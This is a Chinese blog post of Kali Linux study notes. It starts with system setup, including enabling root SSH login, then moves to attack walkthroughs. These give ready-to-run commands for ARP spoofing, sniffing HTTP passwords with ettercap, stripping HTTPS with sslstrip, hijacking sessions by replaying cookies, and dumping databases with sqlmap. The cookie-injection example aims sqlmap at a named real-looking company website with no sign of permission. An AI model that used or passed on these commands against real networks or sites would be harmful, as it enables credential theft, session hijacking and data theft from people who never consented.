kali学习笔记

本文讲述了在完成kali安装后其配置的基础过程。操作系统为kali 2018.1。

更新源

更新源的配置文件目录:/etc/apt/sources.list,更新源可以从网络上获取,以下为我使用的更新源:

1
2
3
4
5
6
7
8
9
10
11
12
13
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

#浙大
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

#阿里云源

deb http://mirrors.aliyun.com/kali sana main non-free contrib
deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free

配置文件修改完成后,使用apt-get update命令更新源,使用apt-get dist-upgrade命令安装源。

安装vmware tools工具

在虚拟机菜单中,找到vmware tools工具,载入镜像进行安装。安装时的参数为默认值,安装完成后重启即可。

kali美化

执行apt-get install kde-full,安装美化界面。安装完成后,在登录时选择该界面即可。

开启ssh

LINUX可以仅进入终端命令界面,从而达到节约资源的目的。

1
2
ctrl + alt + f2 进入命令行界面
ctrl + alt + f1 进入GUI界面

开启ssh需要开启ssh服务,使用以下命令及配置开启后,可直接远程连接。

1
2
3
/etc/init.d/ssh start   #开启ssh
ps -ef |grep ssh #检查是否启动成功
nano /etc/ssh/sshd_config 将PermitRootLogin改为yes


ARP欺骗

ARP欺骗原理

1
2
3
fping -asg 192.168.1.0/24      #查询在线IP
echo 1 > /proc/sys/net/ipv4/ip_forward #打开IP转发
arpspoof -i <网卡名> -t <欺骗目标IP> <我是谁> #仅执行该命令则为arp断网攻击

图片捕获

1
2
(1)开启ARP欺骗
(2)driftnet -d 存放目录 -i 网卡名称

ettercap实现获取http密码

1
2
(1)开启ARP欺骗
(2)ettercap -Tq -i eth0 #T表示文本模式,q表示静默模式

ettercap实现获取https密码

执行nano /etc/ettercap/etter.conf命令,修改配置文件

1
2
3
4
在Linux下,将两个注释放开:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport ...
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport...

使用sslstrip工具将https的链接还原为http, sslstrip的原理

1
sslstrip -afk

再执行http密码获取的方法

1
2
(1)开启ARP欺骗
(2)ettercap -Tq -i eth0 #T表示文本模式,q表示静默模式

会话劫持

方法1

  • (1)开启ARP欺骗
  • (2) 打开wireshark软件,对ARP欺骗的网卡进行抓包,完成后保存格式为Wireshark/tcpdump/...- pcap
  • (3) 使用ferret,生成抓包后的流量信息文件

    1
    ferret -r c.pcap
  • (4) 使用hamster重放流量

    1
    2
    cp hamster.txt /root/   #将第3步的流量信息文件放到/root目录下
    hamster #启动软件

    打开浏览器,在浏览器中设置代理为127.0.0.1:1234,网站访问127.0.0.1:1234,左侧为cookie,点击重放即可。

方法2

  • (1)打开arp欺骗
  • (2)进入/usr/bin目录下,执行ferret -i eth0
  • (3)进入/usr/bin目录下,执行hamster
  • (4)浏览器配置127.0.0.1:1234代理,并访问127.0.0.1:1234
  • (5)流量经过eth0时,浏览器中adapters中选择eth0,并提交,cookie会实时更新。

sqlmap工具

asp网站的渗透

1
2
3
4
sqlmap -u "注入点"             #检测是否存在注入,如果存在,则返回数据库的名字等信息
sqlmap -u "注入点" --tables #猜所有的表名
sqlmap -u "注入点" --columns -T "表名" #猜表中的列名
sqlmap -u "注入点" --dump -C "列名1,..." -T "表名" #猜列出的列的值,dump表示下载数据

php网站的渗透

1
2
3
4
5
6
7
sqlmap -u "注入点"             #检测是否存在注入,如果存在,则返回数据库的名字等信息
sqlmap -u "注入点" --is-dba #检测是否是dba权限,如果是,那么就可以直接写文件到目录文件夹下
sqlmap -u "注入点" --dbs #列出所有的数据库,access是没有的
sqlmap -u "注入点" --current-db #查找自己的数据库
sqlmap -u "注入点" --tables -D "数据库名" #根据数据库名来查询所有表名
sqlmap -u "注入点" --columns -T "表名" -D "数据库名" #查询所有的列名
sqlmap -u "注入点" --dump -C "列名1,..." -T "表名" -D "数据库名" #查询列的字段

cookie注入

http://www.wisefund.com.cn/about.asp?id=56为例

1
2
3
4
sqlmap -u "http://www.wisefund.com.cn/about.asp" --cookie "ie=56" --level 2 #cookie里写ID的参数,如果是cookie注入,需要提升等级为level 2
sqlmap -u "http://www.wisefund.com.cn/about.asp" --tables --cookie "ie=56" --level 2 #猜表名
sqlmap -u "http://www.wisefund.com.cn/about.asp" --columns -T "表名" --cookie "ie=56" --level 2 #猜列名
sqlmap -u "http://www.wisefund.com.cn/about.asp" --dump -C "列名1,..." -T "表名" --cookie "ie=56" --level 2 #猜值

本文标题:kali学习笔记

文章作者:Jerry

发布时间:2018年03月05日 - 23:38:53

最后更新:2019年08月28日 - 23:59:29

原始链接:https://jerryma0912.github.io/2018/03/05/8-kali/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。